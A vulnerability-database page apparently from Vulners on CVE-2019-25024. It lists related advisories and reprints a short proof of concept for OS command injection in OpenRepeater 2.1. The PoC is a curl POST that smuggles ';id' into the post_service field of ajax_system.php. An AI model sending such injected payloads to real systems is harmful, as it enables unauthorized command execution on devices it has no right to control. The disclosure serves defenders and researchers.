| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Exploit for OS Command Injection in Alleghenycreative Openrepeater | 19 Feb 202115:05 | – | githubexploit | |
| CVE-2019-25024 | 4 Dec 202521:02 | – | circl | |
| Aaron Crawford OpenRepeater Operating System Command Injection Vulnerability | 18 Feb 202100:00 | – | cnnvd | |
| OpenRepeater Command Injection (CVE-2019-25024) | 8 Mar 202100:00 | – | checkpoint_advisories | |
| CVE-2019-25024 | 19 Feb 202103:37 | – | cve | |
| CVE-2019-25024 | 19 Feb 202103:37 | – | cvelist | |
| CVE-2019-25024 | 19 Feb 202104:15 | – | nvd | |
| CVE-2019-25024 | 19 Feb 202104:15 | – | osv | |
| 📄 OpenRepeater 2.1 Command Injection | 3 Dec 202500:00 | – | packetstorm | |
| Command injection | 19 Feb 202104:15 | – | prion |
# Exploit Title: OpenRepeater 2.1 - OS Command Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/OpenRepeater/openrepeater
# Software Link: https://github.com/OpenRepeater/openrepeater
# Version: 2.1
# Tested on: Ubuntu
# CVE : CVE-2019-25024
Proof Of Concept
# PoC for OS Command Injection in OpenRepeater before version 2.2
# The target URL for the vulnerable endpoint
TARGET_URL="http://openrepeater/functions/ajax_system.php"
# The payload to execute an arbitrary command, e.g., 'id' to demonstrate the vulnerability
PAYLOAD="post_service=;id"
# Sending the payload using curl
curl -X POST -d "$PAYLOAD" "$TARGET_URL"
Steps to Reproduce:
1. Send the POST request.
2. Observe the result and injected command (e.g., uid=...) will appear.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation